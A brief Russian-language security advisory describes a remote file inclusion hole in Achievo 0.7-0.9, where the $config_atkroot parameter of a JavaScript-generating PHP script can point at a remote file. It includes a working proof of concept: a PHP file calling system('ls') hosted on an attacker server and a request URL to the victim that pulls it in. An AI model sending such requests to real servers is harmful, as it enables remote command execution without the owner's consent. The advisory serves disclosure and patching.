Achieva включает PHP сценарий, который используется для генерации JavaScript (class.atkdateattribute.js.php). Этот сценарий использует множество PHP include_once() инструкций, чтобы вызвать код, содержащийся в функциональных библиотеках.
Нападающие могут изменять переменную $config_atkroot, которая определяет местоположение внешних файлов, и определять произвольное местоположение
скриптов, например указывать путь к PHP
сценарию на удаленном хосте. Успешная эксплуатация уязвимости позволяет удаленному атакующему выполнять команды с привилегиями процесса Web сервера. Пример:
1. Создаем файл ls.txt и сохраняем его на своем Web сервере:
<?php system('ls'); ?>
2. Вызываем уязвимый сценарий:
http://victimhost/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attackerhost/ls.txt?
Уязвимость обнаружена в Achieva 0.7-0.9.